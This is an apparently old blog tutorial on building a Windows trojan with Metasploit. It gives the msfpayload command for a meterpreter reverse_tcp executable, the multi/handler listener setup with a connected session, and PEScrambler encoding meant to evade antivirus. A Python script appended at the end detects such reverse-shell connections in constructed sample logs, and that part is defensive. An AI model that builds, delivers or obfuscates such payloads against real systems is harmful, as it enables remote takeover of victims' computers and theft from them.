Thursday, 19 December 2013

MAKING A TROJAN TO BACKDOOR WINDOWS 7
The msfpayload command is used to generate a variety of payloads for different target systems. If you do not already know, a payload is a piece of code that does one very SPECIFIC task on a system as intended by the hacker, for example opening a reverse shell or running a VNC program. When running a remote exploit, you always want to run a payload as well so that the system comes under your control.

So let's start with the msfpayload command and see what it can do.

$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=6666 x > ~/Desktop/trojan.exe

The above command creates a meterpreter payload for Windows that uses a reverse TCP connection. The other important parameters are LHOST (the local host IP address) and LPORT (the local host port number). The LHOST IP must be the IP address of the hacker's machine that is running Metasploit. The IP address and the port number must be reachable from the target machine, since in reverse TCP the victim initiates the connection to the hacker's machine.

Now this file "trojan.exe" is supposed to run on the victim machine, but not yet. First we have to start a listener on the hacker's machine so that it can receive the incoming connection from the trojan. To do this, enter the msfconsole.

msf > use exploit/multi/handler

msf exploit(handler) > set LHOST 192.168.1.4
LHOST => 192.168.1.4
msf exploit(handler) > set LPORT 6666
LPORT => 6666
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.4:6666
[*] Starting the payload handler...

Now run trojan.exe on the Windows machine. The msfconsole will open a meterpreter session as soon as the trojan connects back.

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.4:6666
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.4:6666 -> 192.168.1.101:44238) at 2013-03-04 11:12:41 +0530

meterpreter >

Handling antivirus - make the trojan undetectable

The trojan created in the above example would run fine on Windows XP and 7 if there is no up-to-date antivirus on them. If there is an antivirus on the system, it would detect the payload signature and warn the user. Windows 8, on the other hand, comes with inbuilt anti-malware protection (Windows Defender) which would detect the trojan right away and would not allow the user to run the program.

So we need a way around this to make the trojan undetectable. A utility called PEScrambler can be used to encode the executable file so that antivirus/anti-malware cannot detect it. Check it out at this link: https://code.google.com/p/pescrambler/

The download contains a single executable file and the usage is straightforward.

C:\>PEScrambler.exe -i trojan.exe -o encoded.exe

Now the encoded.exe file is different from trojan.exe and is encoded in such a way that antivirus may not be able to detect it.

At this point in time, most antivirus and anti-malware products have become fully aware of the above techniques and it would be very difficult for the trojan to go undetected. The Windows 8 inbuilt anti-malware detects all such types of payloads generated from msfpayload and encoded with msfencode, regardless of the iteration level.
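Since encoding defeats only the signature check, the part of this technique that an encoder cannot hide is the network behaviour described earlier: the victim process initiates an outbound connection to the handler and immediately pulls a large stage (752128 bytes in the handler output above). The following is an added, defender-side example and is not code from the original post or from Metasploit. It scans constructed, simplified Sysmon-style "network connect" events (the log format, the directory markers, the expected-port allowlist and the 256 KiB stage threshold are all assumptions chosen for the example) and flags events that combine several of these weak signals.

```python
import re

# Constructed sample endpoint "network connect" events (simplified, Sysmon-like).
# These lines are made up for this example; the 752128-byte transfer mirrors the
# stage size shown in the handler output on this page.
SAMPLE_EVENTS = [
    r"2013-03-04 11:12:39 image=C:\Users\bob\Desktop\encoded.exe dst=192.168.1.4:6666 proto=tcp bytes_in=752128",
    r"2013-03-04 11:12:40 image=C:\Program Files\Internet Explorer\iexplore.exe dst=93.184.216.34:443 proto=tcp bytes_in=51200",
    r"2013-03-04 11:13:02 image=C:\Users\bob\AppData\Local\Temp\trojan.exe dst=192.168.1.4:6666 proto=tcp bytes_in=752128",
    r"2013-03-04 11:14:00 image=C:\Windows\System32\svchost.exe dst=192.168.1.1:53 proto=udp bytes_in=120",
]

# Assumed log layout for this example: timestamp, process image, destination,
# protocol and bytes received on the first exchange.
EVENT_RE = re.compile(
    r"^(?P<ts>\S+ \S+) image=(?P<image>.+?) dst=(?P<ip>[\d.]+):(?P<port>\d+) "
    r"proto=(?P<proto>\w+) bytes_in=(?P<bytes_in>\d+)$"
)

# Directories an unprivileged user can write to; a freshly dropped executable
# running from one of these is a weak but useful signal (assumed list).
USER_WRITABLE_MARKERS = ("\\desktop\\", "\\downloads\\", "\\temp\\", "\\users\\public\\")

# Ports where an outbound client connection is ordinarily expected
# (assumption for the example; tune for the environment).
EXPECTED_PORTS = {22, 25, 53, 80, 443, 587, 993, 995}

# A staged payload pulls its second stage right after connecting; anything above
# this many inbound bytes on the first exchange is treated as suspicious.
STAGE_BYTES_THRESHOLD = 256 * 1024


def parse_event(line):
    """Return the event fields as a dict, or None if the line does not match."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["port"] = int(ev["port"])
    ev["bytes_in"] = int(ev["bytes_in"])
    return ev


def score_event(ev):
    """Return the list of behavioural reasons this event resembles a reverse shell."""
    reasons = []
    image = ev["image"].lower()
    if any(marker in image for marker in USER_WRITABLE_MARKERS):
        reasons.append("executable runs from a user-writable directory")
    if ev["proto"].lower() == "tcp" and ev["port"] not in EXPECTED_PORTS:
        reasons.append("outbound TCP to a non-standard port %d" % ev["port"])
    if ev["bytes_in"] >= STAGE_BYTES_THRESHOLD:
        reasons.append("large inbound transfer (%d bytes) right after connect" % ev["bytes_in"])
    return reasons


def detect(lines, min_reasons=2):
    """Flag events that accumulate at least min_reasons independent signals."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue  # skip lines that do not match the assumed format
        reasons = score_event(ev)
        if len(reasons) >= min_reasons:
            findings.append({
                "ts": ev["ts"],
                "image": ev["image"],
                "dst": "%s:%d" % (ev["ip"], ev["port"]),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f["ts"], f["image"], "->", f["dst"])
        for r in f["reasons"]:
            print("   -", r)
```

On the constructed events, the two droppers connecting to port 6666 are flagged with all three reasons, while the browser on 443 and svchost on 53 produce no findings. Requiring two independent signals rather than one keeps a single noisy rule (a legitimate installer in Downloads, an internal service on an odd port) from paging anyone on its own.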
